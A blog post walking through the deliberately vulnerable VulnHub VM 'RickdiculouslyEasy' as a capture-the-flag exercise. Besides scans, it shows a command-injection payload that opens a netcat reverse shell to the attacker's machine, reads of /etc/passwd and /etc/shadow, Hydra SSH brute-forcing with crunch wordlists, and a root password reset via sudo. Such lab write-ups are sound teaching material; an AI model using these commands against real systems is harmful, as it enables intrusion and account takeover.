Penetration Testing 101 – CTF Edition

As mentioned in my previous article, I participated in a CTF competition. Part of that CTF competition included OSINT (Open-Source Intelligence) and penetration testing exercises. Today, I want to discuss penetration testing 101 in a CTF environment.

This post contains affiliate links. If you use these links to buy something I may earn a commission. Full disclosure here.

Pre-engagement

Pentesting in the real world starts with the pre-engagement phase. This phase involves engaging with the client to find out their goals, scope of work, etc. It’s different in a CTF environment. Some CTF will give you the rules of engagement and possibly a topology. Others might not provide anything, and it’s up to you to figure it all out.

Know thy enemy

Reconnaissance plays a vital role in successful penetration testing. Without a solid reconnaissance, there is a high chance of failure to complete the pentest or may take longer than expected. The goal of reconnaissance is to gather information for possible entry points to the target system(s).

The definition of the reconnaissance phase will vary depending on where you get your information. In Cisco’s CCNP SCOR on-demand course, this phase does include both passive and active reconnaissance.

In passive reconnaissance, the attacker’s focus is to gather information about the target without engaging actively. It means the attacker is gathering information by using their favorite search engine, Shodan, whois information, etc.

In active reconnaissance, the attacker is actively interacting with the target(s). Attackers typically perform port scans, ping sweeps, vulnerability scanning, etc. This method of reconnaissance is actively interacting with the target(s), which means there’s a trail of the attack.

Exploiting vulnerabilities

Once you’ve identified the target system(s) and vulnerabilities, you are now ready to perform your attacks. The attacks will consist of web application attacks, network-based attacks, etc.

There are many tools available that you can use, such as Metasploit, Hydra, password cracking tools, etc. In a lot of cases, you are going to use a combination of tools to gain access.

Documentation and reporting

I haven’t heard or participated in any CTF event where documentation and reporting are required. In the real world, the pentesting report and remediation plans are vital to the client. They may use it for compliance and improve their defenses.

A pentester in the real world will need to hone their documentation and presentation skills to communicate their findings and remediation plans. A CTF player won’t need to write any reports. The main objective is to capture the flag.

CTF walkthrough

The best way to learn is by example. That said, I suggest you download the same VM that I’m attacking so you can follow along. The VM I’m using for this demo is called RickdiculouslyEasy from VulnHub.

In the CTF competition that I participated in, there were few targets. Since we had a diagram, we knew the IP addresses of the targets. However, I still performed the ping sweep to find out if they are responding. There are two tools that I use for this task: Nmap and fping. Though, I tend to use the latter for this purpose.

Nmap

I think the base install of Kali Linux includes Nmap. If not, it’s easy to install it by issuing sudo apt install nmap -y syntax. Once installed, enter the syntax below in the terminal to perform a ping sweep for the whole 172.16.20.0/24 subnet.

andrew@kali:~$ nmap -sn 172.16.20.0/24
 Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 19:48 PST
 Nmap scan report for 172.16.20.1
 Host is up (0.00029s latency).
 Nmap scan report for 172.16.20.50
 Host is up (0.00054s latency).
 Nmap scan report for 172.16.20.51
 Host is up (0.00025s latency).
 Nmap done: 256 IP addresses (3 hosts up) scanned in 15.63 seconds

The -sn command flag essentially disables port scan. There are many command flags available, so hit the man page and read it. Alternatively, you can buy the Nmap book or read it online for free.

fping

I came across this tool long before I knew how to use Nmap. That said, I tend to use this a lot more for ping sweep than Nmap. It is not in the default Kali Linux installation, so you have to add it. To install, issue the sudo apt install fping -y syntax. To perform a ping sweep for the same subnet as above, issue the syntax below.

andrew@kali:~$ fping -ga 172.16.20.0/24
 172.16.20.1
 172.16.20.50
 172.16.20.51
 ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2
 ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2
 ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2
 ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2
 < -- Output omitted for brevity -- >

Let’s break down the command for those who are unfamiliar with the tool. The -g means that I want to either specify a start and end IP target list or a target subnet. The -a means to show only the targets that are alive.

andrew@kali:~$ fping -ga 172.16.20.0/24 2> /dev/null
 172.16.20.1
 172.16.20.50
 172.16.20.51

Depending on the version installed, the unreachable messages may not show up. Newer versions include the unreachable messages, so I tend to add the 2> /dev/null syntax to remove from the output, as shown in the second one.

Services running

Once you have a list of IP addresses, it’s time to find out the services they are running for a possible entry point(s). The well-known tool for this job is Nmap.

andrew@kali:~$ sudo nmap -A -T5 172.16.20.50 -p 1-65535
 Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 20:04 PST
 Nmap scan report for 172.16.20.50
 Host is up (0.00023s latency).
 Not shown: 65528 closed ports
 PORT      STATE SERVICE VERSION
 21/tcp    open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
 |drwxr-xr-x    2 0        0               6 Feb 12  2017 pub | ftp-syst:  |   STAT:  | FTP server status: |      Connected to ::ffff:172.16.20.51 |      Logged in as ftp |      TYPE: ASCII |      No session bandwidth limit |      Session timeout in seconds is 300 |      Control connection is plain text |      Data connections will be plain text |      At session startup, client count was 3 |      vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp    open  ssh? | fingerprint-strings:  |   NULL:  |    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
 |ssh-hostkey: ERROR: Script execution failed (use -d to debug) 80/tcp    open  http    Apache httpd 2.4.27 ((Fedora)) | http-methods:  |  Potentially risky methods: TRACE
 |http-server-header: Apache/2.4.27 (Fedora) |_http-title: Morty's Website 9090/tcp  open  http    Cockpit web service 161 or earlier |_http-title: Did not follow redirect to https://172.16.20.50:9090/ 13337/tcp open  unknown | fingerprint-strings:  |   NULL:  |    FLAG:{TheyFoundMyBackDoorMorty}-10Points
 22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
 | ssh-hostkey: 
 |   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
 |   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
 |_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519)
 60000/tcp open  unknown
 | fingerprint-strings: 
 |   NULL, ibm-db2: 
 |_    Welcome to Ricks half baked reverse shell…
 3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port22-TCP:V=7.91%I=7%D=11/23%Time=5FBC8662%P=x86_64-pc-linux-gnu%r(NUL
 SF:L,42,"Welcome\x20to\x20Ubuntu\x2014.04.5\x20LTS\x20(GNU/Linux\x204.
 SF:4.0-31-generic\x20x86_64)\n");
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port13337-TCP:V=7.91%I=7%D=11/23%Time=5FBC8662%P=x86_64-pc-linux-gnu%r(
 SF:NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port60000-TCP:V=7.91%I=7%D=11/23%Time=5FBC8668%P=x86_64-pc-linux-gnu%r(
 SF:NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell.\
 SF:..\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20r
 SF:everse\x20shell...\n#\x20");    
 MAC Address: 00:0C:29:34:CE:AA (VMware)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.9
 Network Distance: 1 hop
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 TRACEROUTE
 HOP RTT     ADDRESS
 1   0.23 ms 172.16.20.50
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 56.92 seconds

If you are following along, you should see similar or the same output as mine. As you can see, we’ve successfully determined the open ports and some information about the services that are running. Additionally, we found some flags.

Let’s break down the Nmap syntax. The -A flag will attempt to detect OS and service version, script scanning, and traceroute. The -T5 flag speeds up the process of scanning. The -p 1-65535 indicates that you want to perform a scan from ports 1 to 65535.

FTP – Port 21

From our Nmap scan result, the built-in script scanning was able to identify that the server is running anonymous FTP. On top of that, it performed a directory listing, which revealed that it contains a flag.

To get the flag, I used the curl command. Alternatively, you can use an FTP client, download and view the file.

andrew@kali:~$ curl ftp://anonymous@172.16.20.50/FLAG.txt
 FLAG{Whoa this is unexpected} - 10 Points

Port 22

As many IT professionals know, port 22 is the default port for the SSH service. However, our Nmap scan result couldn’t identify it as such. That said, it’s safe to assume it’s not running SSH service. We can always verify that.

andrew@kali:~$ nc 172.16.20.50. 22
 Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
 whoami
 ^C

Nothing happened when we issued a command, so we probably should move on.

HTTP – Port 80

From our Nmap scan result, we can tell that it is indeed running a web server. You can use Firefox for this task or use curl. For this purpose, I used the curl syntax below.

andrew@kali:~$ curl 172.16.20.50
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<center><font size="20" color="yellow"><b>MORTY'S COOL WEBSITE</b></font></center>
<center><font size = "5" color="yellow">It's not finished yet ok. Stop judging me.</font></center>
<style>
body 
{
    background-image: url("morty.png");
}
</style>
</head>
</html>

There’s no flag showing up as text, so it might be worth skipping this for now. While some CTF challenges will hide the flag using steganography tools, we don’t want to analyze the morty.png file for now. We can always come back to that later since we’re not done with our reconnaissance just yet.

Directory scanning

One of the things I learned from a penetration testing course, which I have yet to finish, was web directory scanning. Kali Linux should have two tools installed, which are dirb (CLI) and dirbuster (GUI).

andrew@kali:~$ dirb http://172.16.20.50/
<-- Output omitted for brevity -->
---- Scanning URL: http://172.16.20.50/ ----
+ http://172.16.20.50/cgi-bin/ (CODE:403|SIZE:217)                                                                                                                                 
+ http://172.16.20.50/index.html (CODE:200|SIZE:326)                                                                                                                               
==> DIRECTORY: http://172.16.20.50/passwords/                                                                                                                                      
+ http://172.16.20.50/robots.txt (CODE:200|SIZE:126)                                                                                                                               
                                                                                                                                                                                   
---- Entering directory: http://172.16.20.50/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Wed Nov 25 06:13:09 2020
DOWNLOADED: 4612 - FOUND: 3

Another tool that you can use is gobuster, which you need to install manually.

andrew@kali:~$ sudo apt install gobuster -y
<-- Output omitted for brevity -->
andrew@kali:~$ gobuster dir -u http://172.16.20.50 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt 
<-- Output omitted for brevity -->
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cgi-bin/ (Status: 403)
/index.html (Status: 200)
/passwords (Status: 301)
/robots.txt (Status: 200)
===============================================================
2020/11/24 20:02:45 Finished
===============================================================

For this scenario, it doesn’t matter which one you use. Both tools discovered files and directories that are useful for finding the flags. For example, both of them found a password directory. Let’s look in there to see what’s in it.

andrew@kali:~$ curl http://172.16.20.50/passwords/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /passwords</title>
 </head>
 <body>
<h1>Index of /passwords</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a>       </td><td> </td><td align="right">  - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="FLAG.txt">FLAG.txt</a>               </td><td align="right">2017-08-22 02:31  </td><td align="right"> 44 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="passwords.html">passwords.html</a>         </td><td align="right">2017-08-23 19:51  </td><td align="right">352 </td><td> </td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>

We found another flag. Let’s use the curl command again to display the flag.

andrew@kali:~$ curl http://172.16.20.50/passwords/FLAG.txt
FLAG{Yeah d- just don't do it.} - 10 Points

We still have an interesting password.html file, so let’s take a look at that. Again, let’s use curl to display the HTML file.

andrew@kali:~$ curl http://172.16.20.50/passwords/passwords.html
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>

It seems like we found a password, but we don’t have a username just yet. Let’s put that in our back pocket and come back to it later when we find at least a username.

We know that we have a cgi-bin directory, but we don’t know what’s in it. So, let’s move on to the robots.txt file.

andrew@kali:~$ curl http://172.16.20.50/robots.txt
They're Robots Morty! It's ok to shoot them! They're just Robots!
/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*

Finally, we found the scripts or applications in the cgi-bin folder. Let’s check what’s in it.

andrew@kali:~$ curl http://172.16.20.50/cgi-bin/root_shell.cgi
<html><head><title>Root Shell
</title></head>
--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->
</html>
andrew@kali:~$ curl http://172.16.20.50/cgi-bin/tracertool.cgi
<html><head><title>Super Cool Webpage
</title></head>
<b>MORTY'S MACHINE TRACER MACHINE</b>
<br>Enter an IP address to trace.</br>
<form action=/cgi-bin/tracertool.cgi
    method="GET">
<textarea name="ip" cols=40 rows=4>
</textarea>
<input type="submit" value="Trace!">
</form>

The root_shell.cgi is a dead end, so we’ll concentrate on the tracertool.cgi page.

Command Injection

When you visit the URL, you will see a simple web application that performs a traceroute to the IP address that you entered. I’m familiar with the injection attack because of the security-related courses I’ve taken.

From an attacker’s perspective, any input form is an attack opportunity. That said, we’re going to attempt to launch a command injection attack. Essentially, we’re just adding a syntax at the end of the expected input.

Let’s try to eliminate the first half of our request to see what happens.

If you’re following along, you will notice that it takes a bit of time for the app to process our input. Not ideal when you’re in a time-bounded CTF. We can choose to continue using this web app, or we can attempt to establish a reverse shell.

Reverse Shell

There are many ways to establish a reverse shell. In this instance, let’s use a familiar tool that we used earlier, and that is Netcat.

For this to work, the attacker must set up a listener port. The listener port will accept the connection from the victim’s machine.

To set up a listener port on our Kali Linux instance, issue the nc -lvp 53 syntax. You should see something similar, as shown below.

andrew@kali:~$ nc -lvp 53
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53

The -l will listen for incoming connections. The -v sets it to verbose mode. The -p specifies the source port to use.

On Morty’s Super Cool Webpage, enter ; nc 172.16.20.52 53 -e /bin/bash syntax.

After the nc, you need to enter an IP address and the port that matches your Kali Linux machine. The -e will execute the given command. In this case, we want /bin/bash to run.

You should notice on your Kali Linux machine that the reverse shell connection was successful.

andrew@kali:~$ nc -lvp 53
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 172.16.20.50.
Ncat: Connection from 172.16.20.50:47182.
whoami
apache

This shell, however, it’s not fully interactive. We can attempt to upgrade it to a fully interactive one by issuing the command, as shown below.

python -c 'import pty.spawn("/bin/bash")'

In this case, nothing happened. You can attempt other ways to get an interactive shell, but in this instance, I’m going to skip it.

Searching for usernames

Let’s view the contents of /etc/passwd and /etc/shadow since we need some usernames and password hash.

cat /etc/passwd;cat /etc/shadow
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/
<-- Output omitted for brevity -->


Pretty ASCII art! It looks like the cat command isn’t working. Let’s try a different command to view the contents of both files.

The head command is a command used to display the first part of a file. Let’s use that utility to see if we can view the content of both files.

head -n 100 /etc/passwd | grep -v nologin ; head -n 100 /etc/shadow
root:x:0:0:root:/root:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash

Let’s break down the first part of the syntax that I issued. The -n 100 specifies that I want to show only the first 100 lines of the file. The grep -v nologin means that I don’t want to see any lines with nologin. The semi-colon allows us to execute a series of commands in a single prompt.

We didn’t see anything for /etc/shadow, so we might not have the privileges to view the file. That’s okay since we seem to have a password that we found earlier.

SSH – Port 22222

We now have usernames and possibly a password for one of the users. Let’s launch an SSH brute force attack. There are two ways of doing this using Hydra. Manually, typing each username and same password or creating a username list. I opted for the latter.

Since I opted for a username list, I created a text file in my home directory.

andrew@kali:~$ cat user.txt
root
RickSanchez
Morty
Summer

Now, I’m ready to launch an SSH brute force attack using Hydra.

andrew@kali:~$ hydra -L user.txt -p winter ssh://172.16.20.50:22222
<-- Output omitted for brevity -->
[22222][ssh] host: 172.16.20.50   login: Summer   password: winter
1 of 1 target successfully completed, 1 valid password found
<-- Output omitted for brevity -->

Our SSH brute force attack was successful! We can use Summer’s account to SSH to our target machine.

Before we move on, let’s break down the syntax that I used. The -L means that you want to use a wordlist. The -p means that you want to use winter against our user list.

andrew@kali:~$ ssh Summer@172.16.20.50 -p 22222
Summer@172.16.20.50's password: 
There was 1 failed login attempt since the last successful login.
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104

Let’s see what files does she have in her home directory.

[Summer@localhost ~]$ ls -l
total 4
-rw-rw-r--. 1 Summer Summer 48 Aug 22  2017 FLAG.txt

We found another flag! Let’s see what the flag is.

[Summer@localhost ~]$ head -n 100 FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points

Poking around

Let’s keep poking around to see what else we can do with our access. The idea here is to get more flags and root access.

[Summer@localhost ~]$ ls -l /etc/shadow ; ls -l /home/root ; ls -l /home/Morty; ls -l /home/RickSanchez
----------. 1 root root 1205 Aug 23  2017 /etc/shadow
ls: cannot access '/home/root': No such file or directory
total 48
-rw-r--r--. 1 root root   414 Aug 22  2017 journal.txt.zip
-rw-r--r--. 1 root root 43145 Aug 22  2017 Safe_Password.jpg
total 0
drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21  2017 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez 26 Aug 18  2017 ThisDoesntContainAnyFlags

We can’t perform password cracking since we don’t have access to the shadow file. But, we have some access to files and directories to get more clues.

Let’s start with Morty’s JPEG and ZIP files.

[Summer@localhost ~]$ unzip /home/Morty/journal.txt.zip
Archive:  /home/Morty/journal.txt.zip
[/home/Morty/journal.txt.zip] journal.txt password: 
   skipping: journal.txt             incorrect password

We need a password for the ZIP file. I don’t have a password aside from winter, so we need to look for some more clues.

Since we found an image, let’s see what we can do with the JPEG file. One of the things I learned during our internal CTF is steganography analysis. That said, we need to analyze the image file.

Steganography

The strings command is one of the tools I learned when performing steganography analysis. Let’s try that out and see.

[Summer@localhost ~]$ strings -n 20 /home/Morty/Safe_Password.jpg 
-bash: strings: command not found

The command is not available on this machine. Let’s transfer it to our Kali Linux machine to analyze the file.

andrew@kali:~$ scp -P 22222 Summer@172.16.20.50:/home/Morty/Safe_Password.jpg .
Summer@172.16.20.50's password: 
Safe_Password.jpg                                                                    100%   42KB   9.0MB/s   00:00

Now, we’re not limited to the target machine’s installed packages. Let’s go ahead and issue the same command we used earlier.

andrew@kali:~$ strings -n 20 Safe_Password.jpg
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

It seems that we found the ZIP file’s password. The -n command flag specifies the minimum string length to display.

Now, let’s unzip the file using the password we just found.

[Summer@localhost ~]$ unzip /home/Morty/journal.txt.zip 
Archive:  /home/Morty/journal.txt.zip
[/home/Morty/journal.txt.zip] journal.txt password: 
  inflating: journal.txt             

As suspected, it worked. Now, let’s see what’s in it.

[Summer@localhost ~]$ head -n 100 journal.txt 
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?
Anyway. Here it is:
FLAG: {131333} - 20 Points 

We found another flag! At this point, we’re at 60 points.

Poking around some more

At this point, we can now move on to RickSanchez’s files. Let’s look at the first directory called RICKS_SAFE.

[Summer@localhost ~]$ ls -l /home/RickSanchez/RICKS_SAFE/
total 12
-rwxr--r--. 1 RickSanchez RickSanchez 8704 Sep 21  2017 safe

It seems that the file is an executable, and we don’t have the privilege to run it. Let’s copy the file to Summer’s home directory and run it from there.

[Summer@localhost ~]$ cp /home/RickSanchez/RICKS_SAFE/safe .
[Summer@localhost ~]$ chmod 777 safe
[Summer@localhost ~]$ ./safe 
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!

It’s talking about command line arguments, so we need to add something at the end for the executable to run correctly. If we go back and read Morty’s journal entry, it’s talking about Rick’s safe or password. Let’s try it out.

[Summer@localhost ~]$ ./safe 131333
decrypt:        FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.� @

We found another flag, and it’s giving us a hint to get Rick’s password. It’s also talking about sudo, so that maybe our way to get root access.

Generating wordlist

I’ve always used a RockYou and other wordlists but never generated a custom one. With that said, I had to use a search engine on how to perform this task. I found out that crunch is one of them.

We’ll use this command line tool to generate wordlists based on the clue. According to the clue, we need at least one uppercase letter, one digit, and one of the words in Rick’s old band’s name. I’ve never watched Rick & Morty show, so I had to use a search engine again. I found out that the name of the band is The Flesh Curtains.

I read a bit of crunch‘s man page and other tutorials on the web. From my understanding, we need to use -t ,% for the first part of the password and add the band’s name separately.

andrew@kali:~$ crunch 5 5 -t ,%The > the.txt
<-- Output omitted for brevity -->
Crunch will now generate the following number of lines: 260 
andrew@kali:~$ crunch 7 7 -t ,%Flesh > flesh.txt
<-- Output omitted for brevity -->
Crunch will now generate the following number of lines: 260 
andrew@kali:~$ crunch 10 10 -t ,%Curtains > curtains.txt
<-- Output omitted for brevity -->
Crunch will now generate the following number of lines: 260 

The first and second values after crunch are the minimum and maximum length of the password. The -t ,% specifies that we want an upper case character and digit for the first two characters of the password before The. That means the first password in our list will be A0The, and the last is Z9The.

Another SSH brute force attack

Now that we have the wordlists, we’re ready to launch another brute force attack against Rick’s account. Same as above, we’re going to use Hydra to perform this task for us.

andrew@kali:~$ hydra -l RickSanchez -P the.txt ssh://172.16.20.50:22222 -t 64
<-- Output omitted for brevity -->
1 of 1 target completed, 0 valid password found
andrew@kali:~$ hydra -l RickSanchez -P flesh.txt ssh://172.16.20.50:22222 -t 64
<-- Output omitted for brevity -->
1 of 1 target completed, 0 valid password found
andrew@kali:~$ hydra -l RickSanchez -P curtains.txt ssh://172.16.20.50:22222 -t 64
<-- Output omitted for brevity -->
[22222][ssh] host: 172.16.20.50   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found

We successfully found the password for RickSanchez’s account. Let’s log into the machine and see if this account is one of the sudoers.

andrew@kali:~$ ssh RickSanchez@172.16.20.50 -p 22222
RickSanchez@172.16.20.50's password: 
Last login: Thu Sep 21 09:45:24 2017
[RickSanchez@localhost ~]$ sudo echo "root:password" | sudo chpasswd
[sudo] password for RickSanchez: 
[RickSanchez@localhost ~]$ 

It took the command! Let’s verify that we can log in using the root account.

andrew@kali:~$ ssh root@172.16.20.50 -p 22222
root@172.16.20.50's password: 
Last login: Fri Sep 15 11:44:15 2017

We’ve successfully rooted the box! While we’ve gained access to the root account, we still need to find more flags. Let’s see what we can find in the root’s directory.

[root@localhost ~]# ls -l
total 8
-rw-------. 1 root root 1214 Aug 18  2017 anaconda-ks.cfg
-rw-r--r--. 1 root root   40 Aug 22  2017 FLAG.txt

We found another flag! Let’s take a look.

[root@localhost ~]# head FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points

At this point, we’re at 110 points. We’re 20 more points away from the finish line.

HTTPS – Port 9090

Since we have two more ports that we haven’t tried, let’s move on to those and see if we can find any more flags. The Nmap scan that we performed earlier detected that port 9090 is HTTPS.

andrew@kali:~$ curl -k https://172.16.20.50:9090 | grep FLAG
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0          <div id="brand">FLAG <b>{There is no Zeus, in your face!} - 10 Points</b></div><!--/#brand-->
100 41766    0 41766    0     0  4078k      0 --:--:-- --:--:-- --:--:-- 4078k

We found another flag. At this point, we just need one more and we’re done.

We have two options from here: perform directory scanning or move on to the next port. Let’s opt for the latter and come back if that’s a dead end.

Port 60000

Since our Nmap scan didn’t recognize what protocol this port is running, we’ll use Netcat to connect to it.

andrew@kali:~$ nc 172.16.20.50 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# head FLAG.txt  
FLAG{Flip the pickle Morty!} - 10 Points 

We’ve finally managed to capture the last flag. Now, we’ve completed this CTF challenge.

Final Thoughts

While CTFs provide learning opportunities, participants are hacking deliberately vulnerable systems. In the real world, when companies pay for penetration testing services, they tend to have a security team that keeps their systems secure.

Don’t get me wrong, CTF is a great way to learn offensive security skills, so don’t let that discourage you. Some of the tools that CTF players use are the same ones used in the real world. But, you must understand that penetration testing in the real world is different and a serious business.

If you are interested in becoming a pentester, make sure to understand the difference between CTF and pentesting. I stumbled upon this book that I want to read eventually.

You might like to read

Disclosure

AndrewRoderos.com is a participant of a few referral programs, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to company websites.